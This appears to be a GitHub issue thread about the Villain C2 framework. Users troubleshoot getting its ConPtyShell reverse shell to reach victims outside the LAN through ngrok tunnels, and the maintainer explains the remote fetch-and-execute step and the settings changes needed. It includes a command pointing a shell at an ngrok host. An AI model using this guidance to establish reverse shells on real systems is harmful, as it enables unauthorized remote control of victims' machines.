ConptyShell Issue

[PH03N1X1000]

The ConPtyShell Only connects to the sessions which are on the localhost and it does not respond to payloads hosted on other network if the session is created through a tunnel.
It just shows listening on the port defined
Can there be any way to make ConptyShell work with sessions made outside of LAN (or should i use the port i specified for the tunnel)
As i cannot perform proper port forwarding as my ISP does not allow it i have to use tunnel for real use case scenarios.
Thanks

[Cr7pt0nic]

For your tunneling I recommend using localtonet or using ngrok, for conptyshell I also had that same issue as well considering conptyshell works perfectly when utilized with my local IPv4 but it had issues getting a connection back through my tunneling IP Address as it stayed as "listening" instead of establishing the connection through the tunnel. Would love to add a feature for conptyshell to instead connect through the tunneling host and port as well.

[t3l3machus]

@Cr7pt0nic @PH03N1X1000 when you run conptyshell, a script is executed on the target session (in the background) which instructs the victim to request and execute Invoke-ConPtyShell from Villain's Http file smuggler that by default runs on port 8888 (hosted for a single request). So in the case of conptyshell as well as upload which works in a similar manner, the http file smuggler service's port should also be publicly accessible, when you are trying this against hosts outside your LAN.

[Cr7pt0nic]

Actually that's not the case whatsoever when I ran conptyshell it asks for an IP or INTERFACE including the PORT and session ID. When I tried using ngrok to communicate with the external host outside my LAN. for example using

conptyshell 4.tcp.ngrok.io 19201 cad7d6-68f1d0-f83a32

The response I get from conptyshell is "Failed to parse LHOST value."

I tried other methods as well including my local IP Address and port 8888 and it states that it's already in use.

Tried doing other means like the same local IP Address and port 4200. It stays as "Listening on [any] 4200"
Okay well that doesn't work either lets try another method maybe I can try using ngrok and than the local port?

conptyshell 4.tcp.ngrok.io 8888 cad7d6-68f1d0-f83a32

Nope same response as before "Failed to parse LHOST value". I can input an interface because the interface itself just leads to the same local IP Address as before. I tried using different ports other than port 8888 and I also tried using ngrok to see if there was any possible solution to the problem.

So I tried other solutions maybe instead of using ngrok I could try using localtonet, another tunneling service. Well no because that didn't work either because it showed the port as listening and still no response actually going to that port. Tried port 8888 still same response as last time "Port already in use" well alright that's useless so I have no other options other than to ask for help because I can't seem to get conptyshell to actually work. From my experience I have seen conptyshell work only on local networks (LAN) and not actually working on external networks (WAN). I was testing this on a virtual machine with the network adapter set to NAT (Network address translation) which makes it so that it's completely separate from my local network doing this test and I found that it didn't work and only worked for devices within the local network.

[t3l3machus]

@Cr7pt0nic

1. To parse a domain name as lhost with TCP based shells, edit [Villain/Core/settings.py and set validate_lhost_as_ip to False:
   

2. Port 8888 is already in use because when you start Villain the http file smuggler service is by default bound to that port. Use another or start Villain with -f to set a different port for that service.

3. After doing all that which will solve your main issues, consider what I wrote in my previous reply.

[Cr7pt0nic]

Alright thank you for the support that should also help solve other peoples issues as well. I didn't realize I had to change the settings.py to actually do it so thank you for that information.